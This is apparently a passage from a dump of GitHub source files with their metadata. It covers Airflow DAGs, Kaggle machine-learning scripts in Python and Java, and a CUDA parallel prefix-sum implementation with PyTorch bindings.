Math.ceil(window.performance.now()) : 0; AJS.BigPipe.metrics.isBigPipeEnabled = 'false' === 'true';\n" }, { "alpha_fraction": 0.6222910284996033, "alphanum_fraction": 0.635706901550293, "avg_line_length": 24.5, "blob_id": "a280a089e2601fb12311ff2dde12640d202794f6", "content_id": "abaf29f1ddfb0de9a30514c6b02eecdd78ce2633", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 969, "license_type": "no_license", "max_line_length": 58, "num_lines": 38, "path": "/test_sql_dag.py", "repo_name": "ShubhamGoel/test", "src_encoding": "UTF-8", "text": "from airflow import DAG\nfrom airflow.operators import PythonOperator, BashOperator\nfrom airflow.hooks import PostgresHook\nfrom datetime import datetime, timedelta\n\n# change these args as needed\ndefault_args = {\n 'owner': 'owner',\n 'depends_on_past': False,\n 'start_date': datetime(2020, 3, 3),\n 'email': ['[email protected]'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=1),\n}\n\ndag = DAG('test_sql', default_args=default_args)\n\npg_hook = PostgresHook(postgres_conn_id='cloudsql')\n\n# replace 'table' with a valid table in your DB\ndef test_query():\n q = 'SELECT * FROM leads;'\n results = pg_hook.get_records(q)\n print(results[:5])\n\ntask1 = PythonOperator(\n task_id='extract',\n python_callable=test_query,\n dag=dag)\n\ntask2 = BashOperator(\n task_id='denote_finish',\n bash_command='echo \"ALL DONE\"',\n dag=dag)\n\ntask1 >> task2\n" }, { "alpha_fraction": 0.6196388006210327, "alphanum_fraction": 0.6489841938018799, "avg_line_length": 25.08823585510254, "blob_id": "01a27260caf981f3dbdfdaa2204e24e8cc04b233", "content_id": "0ac84aaeb065704f3bf3f0efe227d934f12d2705", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 886, "license_type": "no_license", "max_line_length": 72, "num_lines": 34, "path": "/bigquery_dag.py", "repo_name": "ShubhamGoel/test", 
"src_encoding": "UTF-8", "text": "from airflow import DAG\nfrom airflow.contrib.operators.bigquery_operator import BigQueryOperator\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2015, 6, 1),\n 'email': ['[email protected]'],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n # 'queue': 'bash_queue',\n # 'pool': 'backfill',\n # 'priority_weight': 10,\n # 'end_date': datetime(2016, 1, 1),\n}\n\ndag = DAG(\n dag_id='bigQueryPipeline', \n default_args=default_args, \n schedule_interval=timedelta(1)\n)\n\nt1 = BigQueryOperator(\n task_id='bigquery_test',\n bql='SELECT COUNT(userId) FROM [events:EVENTS_20160501]',\n destination_dataset_table=False,\n bigquery_conn_id='bigquery_default',\n delegate_to=False,\n udf_config=False,\n dag=dag,\n)" } ]
3
marvbushi/Python_Data_Structures
https://github.com/marvbushi/Python_Data_Structures
4a3354dcc02fd21bf07e0640c02ebb56e5657a29
00c2f278fc1aad2eb6f0f284452166f72d65ad09
448cd10cc093810c86d5f0a41ce4114acf2c40c9
refs/heads/master
2020-04-05T09:02:08.497405
2018-11-08T17:48:55
2018-11-08T17:48:55
156,739,708
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.51171875, "alphanum_fraction": 0.58203125, "avg_line_length": 13.9375, "blob_id": "b87d8ebf6bbac55650d47760746cecc1a9480b32", "content_id": "4d1dcf4df3061cf62e949bd0650fd4a7abd2a36f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 512, "license_type": "no_license", "max_line_length": 37, "num_lines": 32, "path": "/Arrays.py", "repo_name": "marvbushi/Python_Data_Structures", "src_encoding": "UTF-8", "text": "\r\n\r\nfrom array import array\r\n\r\narr = array('i', [10,20,30,40,50])\r\n\r\n# Accessing array elements\r\nprint(\"Accessing array elements\")\r\nprint (arr[0])\r\nprint (arr[2])\r\nprint(\"-\" * 20)\r\n\r\n# insert()\r\nprint(\"Inserting 60 at index 1.....\")\r\narr.insert(1,60)\r\n\r\n# remove()\r\narr.remove(40)\r\nprint(\"-\" * 20)\r\n\r\n# Search\r\ntry:\r\n print(arr.index(40))\r\nexcept:\r\n print(\"Value not found\")\r\nprint(\"-\" * 20)\r\n\r\n# Updating\r\nprint(\"Updating index 2 equal to 80\")\r\narr[2] = 80\r\n\r\nprint(\"-\" * 20)\r\nfor x in arr:\r\n print(x)" } ]
1
Lewuathe/kaggle-repo
https://github.com/Lewuathe/kaggle-repo
d45a95cf55efb6e043a65975521f1c1dde3f8b4e
532defa5bd8d3bf29454ec2aa962c656ab8ae75e
36f8b0408e0569198e87fe2c007f84e0fa776a3e
refs/heads/master
2020-04-06T06:56:11.085081
2015-03-25T13:21:32
2015-03-25T13:21:32
14,251,889
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4616503119468689, "alphanum_fraction": 0.48400580883026123, "avg_line_length": 34.269229888916016, "blob_id": "40bdf1e6da3eac385fe133f8a4cd70dccc2d44be", "content_id": "9d761189a0cdd1836b102e5c198f1abf595fe796", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5502, "license_type": "permissive", "max_line_length": 110, "num_lines": 156, "path": "/DigitRecognizer/src/main/java/Main.java", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "import com.lewuathe.magi.NeuralNetwork;\nimport com.lewuathe.magi.Util;\nimport com.orangesignal.csv.Csv;\nimport com.orangesignal.csv.CsvConfig;\nimport com.orangesignal.csv.CsvReader;\nimport com.orangesignal.csv.CsvWriter;\nimport com.orangesignal.csv.handlers.ResultSetHandler;\nimport com.orangesignal.csv.handlers.StringArrayListHandler;\n\nimport java.io.*;\nimport java.util.Arrays;\nimport java.util.DoubleSummaryStatistics;\nimport java.util.List;\nimport java.util.function.BiConsumer;\n\n/**\n * Created by sasakiumi on 4/24/14.\n */\npublic class Main {\n\n public static final int TRAIN_NUM = 41000;\n public static final int TEST_NUM = 100;\n public static final int ANS_NUM = 28000;\n public static final int EPOCHS = 15;\n public static final double LEARNING_RATE = 0.1;\n public static final int TRAINING_SET_CYCLE = 1;\n public static final double MIN_VALUE = 0.0000001;\n\n public static int maxIndex(double[] ds) {\n int maxIndex = 0;\n double max = -Double.MAX_VALUE;\n for (int i = 0; i < ds.length; i++) {\n if (max < ds[i]) {\n maxIndex = i;\n max = ds[i];\n }\n }\n return maxIndex;\n }\n\n public static double test() throws IOException {\n CsvConfig cfg = new CsvConfig();\n cfg.setSkipLines(1);\n CsvReader reader = new CsvReader(new FileReader(\"train.csv\"), cfg);\n List<String> s = reader.readValues();\n double[][] xs = new double[TRAIN_NUM][784];\n double[][] ys = new double[TRAIN_NUM][10];\n\n int count = 0;\n 
int[] numLayers = {784, 30, 10};\n NeuralNetwork nn = new NeuralNetwork(numLayers);\n for (int circle = 0; circle < TRAINING_SET_CYCLE; circle++) {\n while (count < TRAIN_NUM) {\n s = reader.readValues();\n for (int i = 1; i <= 784; i++) {\n xs[count][i - 1] = Double.parseDouble(s.get(i)) / 256.0;\n //xs[count][i - 1] += MIN_VALUE;\n }\n //xs[count] = Util.standardize(xs[count]);\n for (int i = 0; i < 10; i++) {\n if (Integer.parseInt(s.get(0)) == i) {\n ys[count][i] = 1.0;\n } else {\n ys[count][i] = 0.0;\n }\n }\n count++;\n }\n }\n\n double[][] testxs = new double[TEST_NUM][784];\n double[][] testys = new double[TEST_NUM][10];\n\n count = 0;\n while (count < TEST_NUM) {\n s = reader.readValues();\n for (int i = 1; i <= 784; i++) {\n testxs[count][i - 1] = Double.parseDouble(s.get(i)) / 256.0;\n //testxs[count][i - 1] += MIN_VALUE;\n }\n //testxs[count] = Util.standardize(testxs[count]);\n for (int i = 0; i < 10; i++) {\n if (Integer.parseInt(s.get(0)) == i) {\n testys[count][i] = 1.0;\n } else {\n testys[count][i] = 0.0;\n }\n }\n count++;\n }\n reader.close();\n nn.train(xs, ys, EPOCHS, LEARNING_RATE, 10, testxs, testys, new BiConsumer<double[][], double[][]>() {\n @Override\n public void accept(double[][] doubles, double[][] doubles2) {\n assert doubles.length == doubles2.length;\n int accuracy = 0;\n for (int i = 0; i < doubles.length; i++) {\n if (maxIndex(doubles[i]) == maxIndex(doubles2[i])) {\n accuracy++;\n }\n }\n System.out.printf(\"Accuracy: %d / %d\\n\", accuracy, TEST_NUM);\n }\n });\n\n CsvReader testReader = new CsvReader(new FileReader(\"test.csv\"), cfg);\n\n count = 0;\n double[][] ansxs = new double[ANS_NUM][784];\n\n while (count < 28000) {\n s = testReader.readValues();\n for (int i = 0; i < 784 ; i++) {\n ansxs[count][i] = Double.parseDouble(s.get(i)) / 256.0;\n }\n count++;\n }\n testReader.close();\n\n CsvWriter writer = new CsvWriter(new FileWriter(\"ans.csv\"));\n List<String> header = Arrays.asList(\"ImageId\", \"Label\");\n 
writer.writeValues(header);\n for (int i = 0; i < ansxs.length; i++) {\n double[] ret = nn.feedforward(ansxs[i]);\n int ans = maxIndex(ret);\n List<String> line = Arrays.asList(String.valueOf(i + 1), String.valueOf(ans));\n writer.writeValues(line);\n }\n writer.close();\n\n\n\n // Verification\n// int accurate = 0;\n// for (int i = 0; i < TEST_NUM; i++) {\n//// for (int j = 0; j < testxs[i].length; j++) {\n//// System.out.printf(\"%f \", testxs[i][j]);\n//// }\n// System.out.println(\"\");\n// double[] ans = nn.feedforward(testxs[i]);\n// for (int j = 0; j < ans.length; j++) {\n// System.out.printf(\"%f \", ans[j]);\n// }\n// System.out.println(\"\");\n// for (int j = 0; j < testys[i].length; j++) {\n// System.out.printf(\"%f \", testys[i][j]);\n// }\n// System.out.println(\"\\n------------\");\n// if (maxIndex(ans) == maxIndex(testys[i])) {\n// accurate++;\n// }\n// }\n// return (double) accurate / TEST_NUM;\n return 1.0;\n }\n}\n" }, { "alpha_fraction": 0.6227741241455078, "alphanum_fraction": 0.6438612937927246, "avg_line_length": 32.85714340209961, "blob_id": "3bcdb73b70444b2800b56aa3a6b515efc2432297", "content_id": "a72e7a51d8fd1803a1a09b71ee8a0fddd81faf5a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2134, "license_type": "permissive", "max_line_length": 133, "num_lines": 63, "path": "/data-science-london/src/grid_search.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nfrom sklearn import cross_validation\nfrom sklearn import preprocessing\nfrom sklearn.grid_search import GridSearchCV\nimport numpy as np\nimport csv\n\ndef output_result(clf):\n test_feature_file = np.genfromtxt(open(\"../data/test.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n test_features = []\n print \"Id,Solution\"\n i = 1\n for test_feature in test_feature_file:\n print str(i) + \",\" + 
str(int(clf.predict(test_feature)[0]))\n i += 1\n\ndef get_score(clf, train_features, train_labels):\n X_train, X_test, y_train, y_test = cross_validation.train_test_split(train_features, train_labels, test_size=0.4, random_state=0)\n\n clf.fit(X_train, y_train)\n print clf.score(X_test, y_test) \n\ndef get_accuracy(clf, train_features, train_labels):\n scores = cross_validation.cross_val_score(clf, train_features, train_labels, cv=10)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\ndef grid_search(train_features, train_labels):\n param_grid = [\n {'C': [1, 10, 100, 1000], 'kernel': ['linear']},\n {'C': [1, 10, 100, 1000], 'gamma': [0.001, 0.0001], 'kernel': ['rbf']},\n ]\n \n clf = GridSearchCV(svm.SVC(C=1), param_grid, n_jobs=-1)\n clf.fit(train_features, train_labels)\n print clf.best_estimator_\n \n\nif __name__ == \"__main__\":\n# train_feature_file = csv.reader(open(\"train.csv\", \"rb\"))\n# train_label_file = csv.reader(open(\"trainLabels.csv\", \"rb\"))\n train_feature_file = np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_label_file = np.genfromtxt(open(\"../data/trainLabels.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n train_features = []\n train_labels = []\n for train_feature, train_label in zip(train_feature_file, train_label_file):\n train_features.append(train_feature)\n train_labels.append(train_label)\n\n train_features = np.array(train_features)\n train_labels = np.array(train_labels)\n\n\n grid_search(train_features, train_labels)\n\n\n# clf.fit(train_features, train_labels)\n# output_result(clf)\n\n" }, { "alpha_fraction": 0.5683563947677612, "alphanum_fraction": 0.5867895483970642, "avg_line_length": 22.25, "blob_id": "45a00846ec72225276122785f6fba9e507d16201", "content_id": "f14e09128308dc47c49246532126da4401d3e395", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 651, "license_type": "permissive", 
"max_line_length": 92, "num_lines": 28, "path": "/conways-reverse-game-of-life/src/predict.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nimport numpy as np\nimport csv\n\nif __name__ == \"__main__\":\n #train_file = np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_file = csv.reader(open(\"../data/train.csv\", \"rb\"))\n\n train_features = []\n train_labels = []\n\n header = train_file.next()\n\n for train_row in train_file:\n delta = train_row[1]\n starts = train_row[2:402]\n stops = train_row[402:802]\n\n train_feature = delta + stops\n train_features.append(train_feature)\n train_labels.append(starts)\n\n clf = svm.SVR()\n clf.fit(\n" }, { "alpha_fraction": 0.4907834231853485, "alphanum_fraction": 0.4976958632469177, "avg_line_length": 26.200000762939453, "blob_id": "246810b43f6f186b9b8f1331154e933bbac9f187", "content_id": "e2057c104ce6708d13539752ef6f87342e94941f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "permissive", "max_line_length": 71, "num_lines": 15, "path": "/diabetic-retinopathy-detection/convert_labels.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport csv\n\nif __name__ == \"__main__\":\n with open('trainLabels.csv', 'r') as f:\n reader = csv.reader(f)\n header = next(reader)\n\n with open('converted_labels.txt', 'w') as wf:\n writer = csv.writer(wf, lineterminator='\\n', delimiter=' ')\n for row in reader:\n writer.writerow([row[0] + '.jpeg', row[1]])\n \n \n" }, { "alpha_fraction": 0.6277992129325867, "alphanum_fraction": 0.6455598473548889, "avg_line_length": 36, "blob_id": "45d684519f5d60a0b17cbf981d6d239ba97eb4d4", "content_id": "82406614734a58d39c2ab876fdcb4514b2dc1282", "detected_licenses": [ "MIT" ], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 1295, "license_type": "permissive", "max_line_length": 198, "num_lines": 35, "path": "/data-science-london/src/simple_svm.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nimport numpy as np\nimport csv\n\nif __name__ == \"__main__\":\n# train_feature_file = csv.reader(open(\"train.csv\", \"rb\"))\n# train_label_file = csv.reader(open(\"trainLabels.csv\", \"rb\"))\n train_feature_file = np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_label_file = np.genfromtxt(open(\"../data/trainLabels.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n train_features = []\n train_labels = []\n for train_feature, train_label in zip(train_feature_file, train_label_file):\n train_features.append(train_feature)\n train_labels.append(train_label)\n\n train_features = np.array(train_features)\n train_labels = np.array(train_labels)\n\n clf = svm.SVC(C=100, cache_size=200, class_weight=None, coef0=0.0, degree=3,gamma=0.001, kernel=\"rbf\", max_iter=-1, probability=False,random_state=None, shrinking=True, tol=0.001, verbose=False)\n\n clf.fit(train_features, train_labels)\n\n test_feature_file = np.genfromtxt(open(\"../data/test.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n test_features = []\n print \"Id,Solution\"\n i = 1\n for test_feature in test_feature_file:\n print str(i) + \",\" + str(int(clf.predict(test_feature)[0]))\n i += 1\n" }, { "alpha_fraction": 0.7521008253097534, "alphanum_fraction": 0.7521008253097534, "avg_line_length": 18.83333396911621, "blob_id": "b7600bd9089fbf63ce08b317ab4731eb5bb71dd8", "content_id": "99581a9dea0564020fb8c0e769eafda3c5d39a9b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 238, "license_type": "permissive", "max_line_length": 66, "num_lines": 12, "path": "/README.md", "repo_name": 
"Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "kaggle-repo\n===========\n\nKaggle programs\n\n## facebook-recruiting-iii-keyword-extraction\n\nhttp://www.kaggle.com/c/facebook-recruiting-iii-keyword-extraction\n\n## data-science-london\n\nhttp://www.kaggle.com/c/data-science-london-scikit-learn\n" }, { "alpha_fraction": 0.6516690850257874, "alphanum_fraction": 0.6681180596351624, "avg_line_length": 36.563636779785156, "blob_id": "85cc012f96136d89a6f015703ee1e5cd1b605745", "content_id": "d884ff1a033f333dfb95279c345e023415a22f43", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2067, "license_type": "permissive", "max_line_length": 198, "num_lines": 55, "path": "/data-science-london/src/cross_validation_svm.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nfrom sklearn import svm\nfrom sklearn import cross_validation\nfrom sklearn import preprocessing\nimport numpy as np\nimport csv\n\ndef output_result(clf):\n test_feature_file = np.genfromtxt(open(\"../data/test.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n test_features = []\n print \"Id,Solution\"\n i = 1\n for test_feature in test_feature_file:\n print str(i) + \",\" + str(int(clf.predict(test_feature)[0]))\n i += 1\n\ndef get_score(clf, train_features, train_labels):\n X_train, X_test, y_train, y_test = cross_validation.train_test_split(train_features, train_labels, test_size=0.4, random_state=0)\n\n clf.fit(X_train, y_train)\n print clf.score(X_test, y_test) \n\ndef get_accuracy(clf, train_features, train_labels):\n scores = cross_validation.cross_val_score(clf, train_features, train_labels, cv=10)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n\nif __name__ == \"__main__\":\n# train_feature_file = csv.reader(open(\"train.csv\", \"rb\"))\n# train_label_file = csv.reader(open(\"trainLabels.csv\", \"rb\"))\n train_feature_file 
= np.genfromtxt(open(\"../data/train.csv\", \"rb\"), delimiter=\",\", dtype=float)\n train_label_file = np.genfromtxt(open(\"../data/trainLabels.csv\", \"rb\"), delimiter=\",\", dtype=float)\n\n train_features = []\n train_labels = []\n for train_feature, train_label in zip(train_feature_file, train_label_file):\n train_features.append(train_feature)\n train_labels.append(train_label)\n\n train_features = np.array(train_features)\n train_labels = np.array(train_labels)\n\n# min_max_scaler = preprocessing.MinMaxScaler()\n# train_features = preprocessing.normalize(train_features, norm=\"l2\")\n\n clf = svm.SVC(C=100, cache_size=200, class_weight=None, coef0=0.0, degree=3,gamma=0.001, kernel=\"rbf\", max_iter=-1, probability=False,random_state=None, shrinking=True, tol=0.001, verbose=False)\n get_accuracy(clf, train_features, train_labels)\n\n\n# clf.fit(train_features, train_labels)\n# output_result(clf)\n\n" }, { "alpha_fraction": 0.5477636456489563, "alphanum_fraction": 0.5610160231590271, "avg_line_length": 26.136363983154297, "blob_id": "5774180fe502b92d33312085d959992524a0655f", "content_id": "2a3cbf21daa117cb30c4f4dc7a427eebdfb458b8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1811, "license_type": "permissive", "max_line_length": 79, "num_lines": 66, "path": "/facebook-recruiting-iii-keyword-extraction/src/tagger.py", "repo_name": "Lewuathe/kaggle-repo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport nltk\nimport sklearn\nimport csv\nimport re\nimport numpy as np\n\nimport os\nimport sys\n\nif __name__ == \"__main__\":\n#\n# Training data from Train.csv\n# Id, Title, Body, Tag\n#\n print \"Reading start\"\n train_file = csv.reader(open(\"Train.csv\", \"rb\"))\n train_header = train_file.next()\n\n test_file = csv.reader(open(\"Test.csv\", \"rb\"))\n test_header = test_file.next()\n\n result_file = open(\"Result.csv\", \"w\")\n result_file.write('\"Id\",\"Tags\"\\n')\n\n 
traindata = []\n testdata = []\n docs = []\n \n print \"Train Start\"\n i = 0\n for data in train_file:\n tokens = re.split(r\"\\W+\", nltk.clean_html(data[2]))\n #tokens = nltk.word_tokenize(nltk.clean_html(data[2]))\n docs.append(tokens)\n i += 1\n if i > 100000:\n break\n\n print \"Make collection start\"\n # Make the collection for calculating TF-IDF\n collection = nltk.TextCollection(docs)\n \n print \"Testing data start\"\n\n for data in test_file:\n title_tokens = nltk.word_tokenize(data[1])\n tokens = re.split(r\"\\W+\", nltk.clean_html(data[2]))\n #tokens = nltk.word_tokenize(nltk.clean_html(data[2]))\n for title_token in title_tokens:\n for i in range(0, 10):\n tokens.append(title_token)\n \n uniqTokens = set(tokens)\n \n tf_idf_scores = {}\n for token in uniqTokens:\n tf_idf_scores[token] = collection.tf_idf(token, tokens)\n\n sorted_tf_idf_scores = sorted(tf_idf_scores.items(), key=lambda x:x[1])\n\n keywords = [ k for k, v in sorted_tf_idf_scores if v > 0.1]\n if len(keywords) <= 0:\n keywords = [ sorted_tf_idf_scores[-1][0] ]\n\n result_file.write(\"%s,\\\"%s\\\"\\n\" % (data[0], \" \".join(keywords)))\n\n \n\n \n" } ]
8
sunyt32/parallel_scan
https://github.com/sunyt32/parallel_scan
02fe3703cfaa6e0ed82170ab63e87e432fe30334
f220ace94e2b4526615f0f23ea47f868d7962e57
081999cbf6fbe8f5b8559289e77c24fad398ad29
refs/heads/master
2023-06-22T11:34:03.610411
2021-07-29T16:37:54
2021-07-29T16:37:54
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.740153431892395, "alphanum_fraction": 0.7636828422546387, "avg_line_length": 38.8979606628418, "blob_id": "62025a37e24613d63fcdb4c35e88af164cae9f3c", "content_id": "40995554a718402c0827749c776aaa8ce8f8e7e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1956, "license_type": "no_license", "max_line_length": 191, "num_lines": 49, "path": "/README.md", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "# Parallel Prefix Sum (Scan) with CUDA \n\n## Pytorch Usage Note\n### Installation\n```\npython setup.py install\n```\n### Usage\n```\nfrom prefix_sum import prefix_sum_cpu, prefix_sum_cuda\n# assuming input is a torch.cuda.IntTensor, num_elements is an integer\n# allocate output_array on cuda\n# e.g. output = torch.zeros((num_elements,), dtype=torch.int, device=torch.device('cuda'))\nprefix_sum_cuda(input, num_elements, output)\n\n# similarly for the CPU version\n# except that both input and output are torch.IntTensor now\nprefix_sum_cpu(input, num_elements, output)\n```\n\n## Original README\n\nMy implementation of parallel exclusive scan in CUDA, following [this NVIDIA paper](http://developer.download.nvidia.com/compute/cuda/1.1-Beta/x86_website/projects/scan/doc/scan.pdf).\n\n>Parallel prefix sum, also known as parallel Scan, is a useful building block for many\nparallel algorithms including sorting and building data structures. In this document\nwe introduce Scan and describe step-by-step how it can be implemented efficiently\nin NVIDIA CUDA. We start with a basic naïve algorithm and proceed through\nmore advanced techniques to obtain best performance. We then explain how to\nscan arrays of arbitrary size that cannot be processed with a single block of threads. 
\n\nThis implementation can handle very large arbitrary length vectors thanks to the [recursively defined scan function](https://github.com/mattdean1/cuda/blob/master/parallel-scan/scan.cu#L105).\n\nPerformance is increased with a memory-bank conflict avoidance optimization (BCAO).\n\n---\n\nSee the [timings](https://github.com/mattdean1/cuda/blob/master/parallel-scan/Submission.cu#L616) for a performance comparison between:\n 1. Sequential scan run on the CPU\n 2. Parallel scan run on the GPU\n 3. Parallel scan with BCAO\n \nFor a vector of 10 million entries:\n\n\t CPU : 20749 ms\n\t GPU : 7.860768 ms\n\t GPU BCAO : 4.304064 ms\n \n Intel Core i5-4670k @ 3.4GHz, NVIDIA GeForce GTX 760\n" }, { "alpha_fraction": 0.6226071119308472, "alphanum_fraction": 0.6599817872047424, "avg_line_length": 20.52941131591797, "blob_id": "fd1fdf5f5cae7178a7f9fa55331f329434ce20fb", "content_id": "6c9f6e715ad87d80262befbbb626a62b93adcab4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1097, "license_type": "no_license", "max_line_length": 80, "num_lines": 51, "path": "/parallel-scan/utils.cpp", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <process.h>\n#include <time.h>\n\n#include \"cuda_runtime.h\"\n\n#include \"utils.h\"\n\nvoid _checkCudaError(const char *message, cudaError_t err, const char *caller) {\n\tif (err != cudaSuccess) {\n\t\tfprintf(stderr, \"Error in: %s\\n\", caller);\n\t\tfprintf(stderr, message);\n\t\tfprintf(stderr, \": %s\\n\", cudaGetErrorString(err));\n\t\texit(0);\n\t}\n}\n\nvoid printResult(const char* prefix, int result, long nanoseconds) {\n\tprintf(\" \");\n\tprintf(prefix);\n\tprintf(\" : %i in %ld ms \\n\", result, nanoseconds / 1000);\n}\n\nvoid printResult(const char* prefix, int result, float milliseconds) {\n\tprintf(\" \");\n\tprintf(prefix);\n\tprintf(\" : %i in %f ms \\n\", result, milliseconds);\n}\n\n\n// from 
https://stackoverflow.com/a/3638454\nbool isPowerOfTwo(int x) {\n\treturn x && !(x & (x - 1));\n}\n\n// from https://stackoverflow.com/a/12506181\nint nextPowerOfTwo(int x) {\n\tint power = 1;\n\twhile (power < x) {\n\t\tpower *= 2;\n\t}\n\treturn power;\n}\n\n\n// from https://stackoverflow.com/a/36095407\nlong get_nanos() {\n\tstruct timespec ts;\n\ttimespec_get(&ts, TIME_UTC);\n\treturn (long)ts.tv_sec * 1000000000L + ts.tv_nsec;\n}" }, { "alpha_fraction": 0.6482412219047546, "alphanum_fraction": 0.6763818860054016, "avg_line_length": 37.269229888916016, "blob_id": "a00e115ed3139c79431aba869c248d288ba705c6", "content_id": "876faba2001608e6613d657ccbf5316d622bd57d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 995, "license_type": "no_license", "max_line_length": 111, "num_lines": 26, "path": "/test.py", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "import torch\nfrom prefix_sum import prefix_sum_cuda, prefix_sum_cpu\nimport numpy as np\n\ndef test(num_pcs, max_num_grids):\n gpu = torch.device(\"cuda:0\")\n cpu = torch.device(\"cpu\")\n grid_cnt = torch.randint(low=0, high=1000, size=(num_pcs, max_num_grids), dtype=torch.int, device=cpu)\n grid_off = torch.full(size=grid_cnt.shape, fill_value=-1, dtype=torch.int, device=cpu)\n\n # grid_cnt_cuda = torch.randint(low=0, high=1000, size=(num_pcs, max_num_grids), dtype=torch.int, device=gpu)\n grid_cnt_cuda = grid_cnt.cuda()\n grid_off_cuda = torch.full(size=grid_cnt.shape, fill_value=-1, dtype=torch.int, device=gpu)\n\n for i in range(num_pcs):\n num_grids = np.random.randint(low=0, high=max_num_grids)\n prefix_sum_cpu(grid_cnt[i], num_grids, grid_off[i])\n prefix_sum_cuda(grid_cnt_cuda[i], num_grids, grid_off_cuda[i])\n print(grid_off[i, :20])\n print(grid_off_cuda[i, :20])\n\n print(torch.allclose(grid_off, grid_off_cuda.cpu()))\n\n\nif __name__ == \"__main__\":\n test(100, 1000000)\n" }, { "alpha_fraction": 0.668367326259613, 
"alphanum_fraction": 0.6734693646430969, "avg_line_length": 17.714284896850586, "blob_id": "35c360921951ebe3e866cb033898980e958f007f", "content_id": "e4e8b8ce8c2fba0372fad65471a8f9535335281b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 392, "license_type": "no_license", "max_line_length": 43, "num_lines": 21, "path": "/prefix_sum.h", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#pragma once\n#include <ATen/ATen.h>\n#include <torch/extension.h>\n\n\nvoid PrefixSumCUDA(\n const at::Tensor grid_cnt,\n int num_grids,\n at::Tensor grid_off);\n\n\nvoid PrefixSumCPU(\n const at::Tensor grid_cnt,\n int num_grids,\n at::Tensor grid_off);\n\n\nPYBIND11_MODULE(TORCH_EXTENSION_NAME, m) {\n m.def(\"prefix_sum_cuda\", &PrefixSumCUDA);\n m.def(\"prefix_sum_cpu\", &PrefixSumCPU);\n}" }, { "alpha_fraction": 0.7672955989837646, "alphanum_fraction": 0.7672955989837646, "avg_line_length": 30.799999237060547, "blob_id": "9f0299d46849c8a351e48eb21d232e78aecb0881", "content_id": "980fe3da602e7f5b654e6399ea71abfb469ce2a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 318, "license_type": "no_license", "max_line_length": 79, "num_lines": 10, "path": "/parallel-scan/utils.h", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#include \"cuda_runtime.h\"\n\nvoid _checkCudaError(const char *message, cudaError_t err, const char *caller);\nvoid printResult(const char* prefix, int result, long nanoseconds);\nvoid printResult(const char* prefix, int result, float milliseconds);\n\nbool isPowerOfTwo(int x);\nint nextPowerOfTwo(int x);\n\nlong get_nanos();\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 29, "blob_id": "61eb8c88a92324dd720d499f316f974717b0050e", "content_id": "fee3f3a603d310702cbd78f9ad0d9b0fda416aa9", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
